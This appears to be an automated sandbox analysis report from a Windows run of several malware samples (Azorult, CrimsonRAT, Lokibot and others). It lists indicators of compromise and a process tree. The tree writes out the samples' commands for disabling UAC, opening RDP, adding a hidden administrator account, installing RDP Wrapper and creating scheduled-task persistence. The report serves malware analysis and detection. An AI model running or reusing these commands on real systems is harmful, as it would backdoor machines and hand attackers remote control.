AUDIODG.EXE Token: SeIncBasePriorityPrivilege 6496 AUDIODG.EXE Token: SeDebugPrivilege 4456 firefox.exe -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 5240 VanToM-Rat(1).bat 416 Server.exe 4320 butterflyondesktop.tmp 4828 ButterflyOnDesktop.exe 5248 msedge.exe 5248 msedge.exe 4456 firefox.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4828 ButterflyOnDesktop.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 5240 VanToM-Rat(1).bat 416 Server.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 5376 Azorult(1).exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 3788 wini.exe 2980 winit.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 2520 rutserv.exe 3128 rutserv.exe 5732 rutserv.exe 2612 rutserv.exe 4552 cheat.exe 832 ink.exe 4520 taskhost.exe 4804 P.exe 5444 R8.exe 5156 winlogon.exe 936 taskhostw.exe 1512 winlogon.exe 4456 firefox.exe 4456 firefox.exe 4456 firefox.exe 5876 Apex.exe 4456 firefox.exe 4456 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 3792 wrote to memory of 4456 3792 firefox.exe 87 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4152 4456 firefox.exe 88 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 PID 4456 wrote to memory of 4304 4456 firefox.exe 89 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult(1).exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 5272 attrib.exe 5220 attrib.exe 3356 attrib.exe 3760 attrib.exe 5040 attrib.exe 2548 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\sample.js1⤵PID:4300
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Downloads MZ/PE file
- Subvert Trust Controls: Mark-of-the-Web Bypass
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27100 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2072 -initialChannelId {9b0972d1-ff4e-41d5-81ce-4b51101057bd} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu3⤵PID:4152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2448 -prefsLen 27136 -prefMapHandle 2452 -prefMapSize 270279 -ipcHandle 2460 -initialChannelId {25c448d0-e410-4360-bc39-d856a52d93f3} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket3⤵PID:4304
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3056 -prefsLen 27277 -prefMapHandle 2836 -prefMapSize 270279 -jsInitHandle 2840 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3652 -initialChannelId {2da12331-d1b0-4698-85c0-fad8ead77a72} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab3⤵
- Checks processor information in registry
PID:2908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3812 -prefsLen 27277 -prefMapHandle 3816 -prefMapSize 270279 -ipcHandle 3900 -initialChannelId {5657e2a5-77f8-41ef-abfe-61ac6ea18057} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd3⤵PID:4088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4500 -prefsLen 34776 -prefMapHandle 4504 -prefMapSize 270279 -jsInitHandle 4508 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4516 -initialChannelId {c98df4cd-45c9-4eea-8583-bdea07d92bb3} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab3⤵
- Checks processor information in registry
PID:3292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5052 -prefsLen 35013 -prefMapHandle 5060 -prefMapSize 270279 -ipcHandle 4988 -initialChannelId {4cab6149-9108-4ffc-b61d-ba7df0d78d81} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility3⤵
- Checks processor information in registry
PID:5224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5380 -prefsLen 32952 -prefMapHandle 5376 -prefMapSize 270279 -jsInitHandle 5372 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5396 -initialChannelId {f0521c19-47cb-4771-9ff6-0f73354cd3d4} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab3⤵
- Checks processor information in registry
PID:5388
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5608 -prefsLen 32952 -prefMapHandle 5612 -prefMapSize 270279 -jsInitHandle 5616 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5364 -initialChannelId {b53b75f2-c23a-47b5-95ef-622bcecc873a} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab3⤵
- Checks processor information in registry
PID:5508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5344 -prefsLen 32952 -prefMapHandle 5356 -prefMapSize 270279 -jsInitHandle 5692 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5768 -initialChannelId {fc10f77c-2185-49ae-903e-0481e27087ab} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab3⤵
- Checks processor information in registry
PID:5524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2900 -prefsLen 33071 -prefMapHandle 6432 -prefMapSize 270279 -jsInitHandle 3668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2892 -initialChannelId {9d803da5-9789-44b4-b1eb-6bf779680829} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab3⤵
- Checks processor information in registry
PID:560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6616 -prefsLen 33071 -prefMapHandle 6624 -prefMapSize 270279 -jsInitHandle 6632 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6640 -initialChannelId {444d8f61-2b0d-414a-bbfe-209ba1de88cb} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab3⤵
- Checks processor information in registry
PID:5264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6848 -prefsLen 33071 -prefMapHandle 6868 -prefMapSize 270279 -jsInitHandle 6864 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6484 -initialChannelId {c90f8933-974d-480d-a86f-327161f4c63e} -parentPid 4456 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4456" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab3⤵
- Checks processor information in registry
PID:4680
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5960 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"4⤵
- Executes dropped EXE
PID:2720
-
-
-
C:\Users\Admin\Downloads\Azorult(1).exe"C:\Users\Admin\Downloads\Azorult(1).exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:5376 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3788 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"5⤵
- Checks computer location settings
PID:5472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "6⤵PID:5924
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"7⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:5972
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"7⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:3724
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2180
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2520
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3128
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5732
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*7⤵
- Views/modifies file attributes
PID:5272
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows7⤵
- Views/modifies file attributes
PID:5220
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10007⤵
- Launches sc.exe
PID:1640
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own7⤵
- Launches sc.exe
PID:2672
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"7⤵
- Launches sc.exe
PID:2444
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat6⤵
- System Location Discovery: System Language Discovery
PID:5448 -
C:\Windows\SysWOW64\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
PID:1456
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4552 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4520 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4804
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5444 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"7⤵
- Checks computer location settings
PID:5256 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "8⤵
- Checks computer location settings
- Modifies registry class
PID:2128 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:352
-
-
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- Delays execution with timeout.exe
PID:6060
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵PID:2864
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar9⤵
- Executes dropped EXE
PID:4720
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5980
-
-
C:\Windows\SysWOW64\timeout.exetimeout 29⤵
- Delays execution with timeout.exe
PID:5012
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"9⤵
- Checks computer location settings
PID:5980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "10⤵
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:4620
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f11⤵PID:3656
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f11⤵PID:1888
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5832
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add11⤵
- System Location Discovery: System Language Discovery
PID:2592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add12⤵PID:2392
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125111⤵PID:5444
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add11⤵PID:5480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add12⤵PID:3240
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add11⤵PID:5676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add12⤵
- System Location Discovery: System Language Discovery
PID:4320
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add11⤵PID:5256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add12⤵PID:5148
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add11⤵PID:5124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add12⤵
- System Location Discovery: System Language Discovery
PID:1304
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add11⤵
- System Location Discovery: System Language Discovery
PID:1348 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add12⤵PID:4284
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5852 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add12⤵PID:3980
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:5448 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add12⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:3724
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add12⤵
- System Location Discovery: System Language Discovery
PID:5452
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵PID:3872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add12⤵
- System Location Discovery: System Language Discovery
PID:4612
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o11⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w11⤵
- Executes dropped EXE
PID:4984
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f11⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
PID:5448
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited11⤵PID:1084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited12⤵PID:2784
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"11⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3356
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"11⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3760
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"11⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5040
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 29⤵
- Delays execution with timeout.exe
PID:5976
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1236⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5824 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5156 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1B7.tmp\1B8.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"8⤵PID:2444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:5952
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe6⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:936 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list8⤵PID:2548
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list9⤵PID:5236
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns7⤵PID:5040
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns8⤵
- Gathers network information
PID:2836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force7⤵PID:3748
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1496
-
-
C:\Windows\system32\gpupdate.exegpupdate /force8⤵PID:2596
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 16⤵
- Scheduled Task/Job: Scheduled Task
PID:4316 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1304
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:2484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat6⤵
- Drops file in Drivers directory
PID:3308 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat6⤵PID:5444
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5480
-
-
